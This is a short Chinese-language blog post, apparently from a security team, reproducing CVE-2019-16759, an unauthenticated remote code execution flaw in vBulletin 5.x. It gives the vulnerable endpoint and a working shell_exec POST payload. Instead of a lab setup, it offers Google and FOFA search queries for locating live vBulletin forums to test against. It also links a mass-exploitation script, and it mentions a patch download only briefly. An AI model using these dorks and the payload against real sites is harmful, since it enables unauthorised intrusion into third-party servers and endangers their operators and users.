CVE-2019-16759：vBulletin 5.x未授权RCE复现

本文作者：CreaT0ye（Timeline Sec核心成员）

本文共562字，阅读大约需要2分钟

0x00 简介

vBulletin是一个收费低廉但强大的建站BBS(论坛)CMS，该CMS国外大量论坛使用，中国国内少许网站使用。近日，vBulletin 5.x爆出一个前台远程代码执行漏洞,无需登录即可触发。该论坛程序在国外的国外的用户量就类似dz论坛在国内的用户量。

0x01 漏洞概述

漏洞通过请求ajax/render/widget_php进行模板注入触发代码执行。

0x02 影响范围

5.0.0 <= vBulletin <=5.5.4

0x03 环境搭建

自行搭建需要付费，因此这里使用google语法和FOFA查找

google语法：

site:*.vbulletin.net

Powered by vBulletin

FOFA：

content="vBulletin" app="vBulletin"

在线靶场获取方式

转发本文至朋友圈并截图发至公众号内即可

0x04 漏洞利用

进入如下vBulletin论坛

访问/index.php?routestring=ajax/render/widget_php会显示以下结果

然后POST如下数据即可执行命令whoami

widgetConfig[code] = echo shell_exec('whoami'); exit;

0x05 修复方式

安全更新补丁下载：

http://members.vbulletin.com/patches.php

Poc及EXP脚本：

https://github.com/Frint0/mass-pwn-vbulletin

参考链接：

https://mp.weixin.qq.com/s/hLBIbaZhwpiulL99BKRogA